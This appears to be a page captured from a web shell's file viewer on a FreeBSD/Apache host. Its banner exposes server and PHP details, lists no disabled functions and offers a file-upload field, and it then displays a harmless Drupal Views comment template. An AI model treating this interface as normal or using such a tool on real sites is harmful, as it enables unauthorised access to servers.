|
Server : Apache/2.4.62 System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64 User : www ( 80) PHP Version : 8.3.8 Disable Function : NONE Directory : /domains/afglcweb/ny/sites/all/modules/views/theme/ |
Upload File : |
<?php // $Id: views-view-row-comment.tpl.php,v 1.1 2008/05/15 22:55:18 merlinofchaos Exp $ /** * @file views-view-row-comment.tpl.php * Default simple view template to display a single comment. * * Rather than doing anything with this particular template, it is more * efficient to use a variant of the comment.tpl.php based upon the view, * which will be named comment-view-VIEWNAME.tpl.php. This isn't actually * a views template, which is why it's not used here, but is a template * 'suggestion' given to the comment template, and is used exactly * the same as any other variant of the comment template file, such as * node-nodeTYPE.tpl.php * * @ingroup views_templates */ ?> <?php print $comment; ?>